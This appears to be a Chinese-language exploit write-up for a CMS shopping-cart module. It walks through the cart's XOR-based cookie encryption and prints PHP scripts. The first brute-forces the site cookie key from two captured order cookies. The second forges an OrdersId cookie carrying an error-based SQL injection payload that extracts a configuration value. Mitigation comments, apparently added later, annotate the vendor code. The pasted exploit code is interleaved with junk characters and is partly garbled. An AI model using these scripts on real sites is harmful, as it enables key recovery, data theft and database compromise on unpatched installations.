www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的
/**
 * Stores a shopping-cart value in a client cookie.
 *
 * Arrays are first flattened by $this->enCode() (not shown here; the
 * surrounding text says it yields an a=yy&b=cc style string) and then,
 * like scalar values, passed through $this->enCrypt().
 *
 * Security note: the cookie is not authenticated. No MAC or signature is
 * attached, so the server's only defence against a forged cookie is the
 * secrecy of enCrypt()/setKey(), and enCrypt() writes its per-call key into
 * the output in the clear. A value that comes back from the client must be
 * treated as untrusted input wherever it is decoded.
 *
 * @param string $key   cookie name
 * @param mixed  $value scalar or array payload
 */
function saveCookie($key,$value)
{
if(is_array($value))
{
// enCode() runs only for arrays; scalars are encrypted as-is.
$value = $this->enCrypt($this->enCode($value));
}
else
{
$value = $this->enCrypt($value);
}
// 36000 s = 10 hours, path "/". No domain, Secure or HttpOnly argument is
// given, so PHP's defaults apply and the cookie is exposed to page scripts
// and to plain-HTTP transport.
setcookie($key,$value,time()+36000,'/');
}
简单地说,$key 就是 cookie 的 key,$value 就是 value,enCode 的作用是将 array 类型转变为 a=yy&b=cc&d=know 这样的形式,关键是 enCrypt 函数
/**
 * Obfuscates $txt for storage in a cookie.
 *
 * Scheme: a fresh key is derived per call as md5(rand(0, 32000)); for every
 * byte of $txt the output receives the current key character in the clear,
 * followed by (plaintext byte XOR key character). The result is then passed
 * through setKey() and base64-encoded.
 *
 * Why this is weak (defender's view):
 *  - rand()/srand() are not cryptographic generators, and the key space is
 *    only 32001 values anyway, so the per-call key is trivially enumerable.
 *  - Each key character is emitted unencrypted next to the byte it masks,
 *    so this layer adds no confidentiality of its own; all secrecy rests on
 *    setKey(), which uses one fixed site-wide key.
 * A forgery-resistant replacement would use random_bytes() for any nonce
 * and attach an HMAC (hash_hmac on write, hash_equals on read) keyed with a
 * server secret, rather than relying on XOR obfuscation.
 *
 * @param string $txt plaintext
 * @return string base64 of setKey() applied to the interleaved stream
 */
function enCrypt($txt)
{
// Reseeds from the clock on every call; rand() is not a CSPRNG either way.
srand((double)microtime() * 1000000);
// Only 32001 possible keys, each a 32-character hex string.
$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++)
{
// Wrap the key index after 32 characters (repeating-key XOR).
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
// The key character is written out in plaintext right before the XORed byte.
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
// Second layer with the site key, then base64 for cookie-safe transport.
return base64_encode($this->setKey($tmp));
}
/**
 * Second obfuscation layer: repeating-key XOR of $txt with the site key.
 *
 * The key stream is md5(strtolower($cfg_cookie_encode)), a 32-character hex
 * string cycled over the input. Because XOR is its own inverse, anyone who
 * knows one input/output pair of at least 32 bytes recovers the entire key
 * stream, and the hex alphabet (0-9a-f) lets wrong candidates be discarded.
 * Presumably a symmetric decode routine exists elsewhere in the class (not
 * shown here), in which case knowledge of the key lets a client produce any
 * cookie the class will accept.
 *
 * Mitigation: treat $cfg_cookie_encode as compromised once cookies have been
 * exposed, rotate it, and replace this construction with an authenticated
 * scheme (HMAC over the payload verified with hash_equals, or an AEAD).
 *
 * @param string $txt bytes to mask
 * @return string same length as $txt
 */
function setKey($txt)
{
// Site-wide secret from the configuration.
global $cfg_cookie_encode;
// Lower-casing before hashing shrinks the effective secret alphabet.
$encrypt_key = md5(strtolower($cfg_cookie_encode));
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++)
{
// Wrap after 32 key characters.
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
enCrypt 的参数 $txt 我们是可知的,返回值就是 cookie 的值,这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
具体代码如下:
( j2 u7 V) G5 p<?php
G( k: z0 m' O( n$ s% \$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here7 A! Q. R `0 S5 ?+ X3 @; t
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
3 ~1 [ n& u7 a; ?4 S$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
) f" J: h5 o5 Lfunction reStrCode($code,$string)( c8 L% j0 _; G- \0 N
{5 \4 E A& T. G* O1 ?& _
$code = base64_decode($code);
/ h% o4 {4 R {5 T( L$key = “”;" t: p. H2 }8 ~, ]
for($i=0 ; $i<32 ; $i++)
8 C0 g* w5 u" v{
& S: U0 S1 s/ L7 f& v9 [$key .= $string[$i] ^ $code[$i];# u* P4 M& L5 H+ [4 J. V
}
* N9 I# n( l+ B% g% F# }8 L& P/ Greturn $key;3 {" A' `" }* Z: x& K: T0 B
}
* p/ W1 _( l9 B% h7 r6 T3 Z% ~function getKeys($cookie,$plantxt)
. Q, x# O1 |8 _6 U6 c, B) H{+ `3 i: P1 \, C3 a3 n2 t9 Z
$tmp = $cookie;2 n: S' f% K, B1 p' m$ e% F: K
$results = array();
( C( p1 ~, X" K* s- @for($j=0 ; $j < 32000; $j++)
. [! y, l0 {2 U2 q$ a) ]% q{: G. ^! L6 u6 f" K6 s' X
- g7 [" E% b" ?2 [& \" O
$txt = $plantxt;
5 A* V- T2 Z- u/ S$ctr = 0; {5 S! M( L2 U( z A' W+ w& m
$tmp = ”;! r6 h( S6 \1 x, v @$ r: l
$encrypt_key = md5($j);
3 Y% V1 z0 n2 U3 h9 \' w- a8 \4 [; h7 zfor($i =0; $i < strlen($txt); $i ++)' S& i0 R0 x3 j1 V# i/ v; F8 H
{2 Y9 Q. ?; H" C8 |) ?
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( b0 f, q" C& ?" ^1 K
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);5 |/ F, c k; t& E
}
! s5 ]" A6 ^2 Y$string = $tmp;; Q) J2 A9 V9 }( t# N( K' t
$code = $cookie;4 ^/ v- N9 I. M- V4 ~6 ]
$result = reStrCode($code,$string);
; L, L, C$ J; x; B: Cif(eregi(‘^[a-z0-9]+$’,$result))
! X5 G; m- S2 \ K7 A- b0 ^{
6 `- I& \; y8 X: d6 v; Jecho $result.”\n”;9 Z$ U# \" H/ P" y) ]! Q2 j% z) J& B! V
$results[] = $result;. H: `/ k" i1 q
}
' [, z0 l" s6 G, ]* {* x6 ]; G+ X& t}# f0 g$ \: k! S" s; r
return $results;3 B* [* R8 ^1 m5 o ~7 f" M
}
& g, Q+ g6 e; i$results1 = getKeys($cookie1,$plantxt);. e$ a2 P9 p0 D. S f! ?
$results2 = getKeys($cookie2,$plantxt);
; ]* Z5 V- J/ {5 Gprint “\n——————–real key————————–\n”;7 X& Q7 E5 Z9 X, ?8 |$ x
foreach($results1 as $test1): ~( G8 F4 [+ G$ ]* m
{
9 B6 Z) Y8 C7 {. [( h! ~foreach($results2 as $test2)4 M; O) z/ |, g! a8 I0 l
{
6 H1 c' @6 C% {' X- ~if($test1 == $test2)
: W0 U; c, T! U ?4 B" b% `5 f! W{: t4 f& U- V1 n7 h' S
echo $test1.”\n”;
( ]& L0 @3 }3 }7 ?: @0 c}- O f$ q: J7 H
}
/ C r* N y3 \& O B `- O( n}2 ]) K5 k! g8 b+ p" o" [$ ?. R
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie,
plantxt 可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个 key 之后,我们就可以构造任意购物车的 cookie
接着看
( I* ~& n# x" c8 }: l5 D20 class MemberShops
/ q% B( d. l; I. Q6 _! x21 { S( Y2 Q8 |) k/ E% `
22 var $OrdersId;
5 S3 ]9 H- L7 T% C8 Z23 var $productsId;
, m' I ~, @! ?/ W' ^24
/**
 * Initialises the cart from the client's "OrdersId" cookie.
 *
 * The order id is read back from the cookie via $this->getCookie() (not
 * shown) and is only regenerated by MakeOrders() when the cookie is empty.
 * No format check is applied to the decoded value here, and the excerpt of
 * plus/carbuyaction.php quoted further down interpolates it directly into a
 * SQL string (WHERE oid='$OrdersId'), so a forged cookie reaches the query
 * unfiltered.
 *
 * Mitigation: validate the decoded id against its expected shape (reject
 * anything that is not alphanumeric) before assigning it, and use a
 * parameterised query at the call site; an "encrypted" cookie is still
 * client-controlled input.
 */
function __construct()
{
// Cookie value is trusted as-is; decoding happens inside getCookie() (not shown).
$this->OrdersId = $this->getCookie("OrdersId");
if(empty($this->OrdersId))
{
// A fresh id is generated only when the client sent none.
$this->OrdersId = $this->MakeOrders();
}
}
发现 OrdersId 是从 cookie 里面获取的
然后
/plus/carbuyaction.php中的
" L5 d' @; t# M9 y% O- M" Q, `29 $cart = new MemberShops();
0 L9 F& K1 i% d39 $OrdersId = $cart->OrdersId; //本次记录的订单号3 Y- l G8 {0 c/ f, e
……$ K$ {* y/ a' J& c. [. Z2 g
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
接着我们就可以注入了
通过利用下面代码生成 cookie:
<?php0 [8 J7 v- g+ M6 k) Q: m
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;: I' p4 t, e4 O+ y
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here6 i" `, E, A" Z7 j* b
function setKey($txt)9 E; }! r' e, e7 S$ G6 g
{
" F7 L: B( h9 aglobal $encrypt_key;
) c. l4 t, H. {. c$ctr = 0;
7 `) X, N/ L' |+ W$tmp = ”;
8 R2 I- ], e5 S5 X3 I g6 j4 G/ Vfor($i = 0; $i < strlen($txt); $i++)
7 Q2 B: T3 o+ z; _ j# H{" e0 Q5 Y, j, @4 C! B0 b% p3 o! b- Y
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
( H8 j1 Y* f0 u% [! a7 O ^7 A- d& Z$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
9 |7 G* \8 u4 h* b$ @ I}! f3 Q# Z8 ^6 O2 r& l' |4 q. f
return $tmp;5 \. @1 m% Z- g+ H- ?- k
}
8 q8 v5 i% D g E8 zfunction enCrypt($txt)
5 L+ H% a: X0 K/ G0 F5 h{8 \) K: S' k0 h$ F8 r# @
srand((double)microtime() * 1000000);
" }# _4 K4 _0 H$encrypt_key = md5(rand(0, 32000));* |4 n- q% Z; N! S' Z
$ctr = 0;. |4 ?0 n( \) _8 L
$tmp = ”;# [! |: j( G9 ?4 ^- w
for($i = 0; $i < strlen($txt); $i++)
/ u. b% P( y* S" O0 q1 o5 }0 c- s{( l2 l; ?5 C( x+ |* g1 @
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
7 d5 k1 ~3 p/ k) Y5 F$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
, K2 f3 M7 g' c$ _: z! G}
; C, L4 r# \* G0 K$ v+ `return base64_encode(setKey($tmp));6 X- V G& X5 @7 e; ?
}
; ^$ P6 j5 O A9 l7 G+ H y4 |for($dest =0;$dest = enCrypt($txt);)5 w- l9 e1 C7 ?* C" |9 C% H F
{6 {5 N4 {0 S# B0 b
if(!strpos($dest,’+'))1 l Z3 q. m+ Z* P* d' k
{
! |$ l, n+ B0 E+ g$ s9 Vbreak;
2 M! _; w+ `/ k6 ^; c! {}3 q; X3 u; u _( V* Z
}
6 s& W0 T% i/ [6 J& o* m; Y0 Wecho $dest.”\n”;5 o/ N' h5 f' C/ U
?>
) \. z- T8 ^' G7 ^, q
; J8 h( c! V3 J D |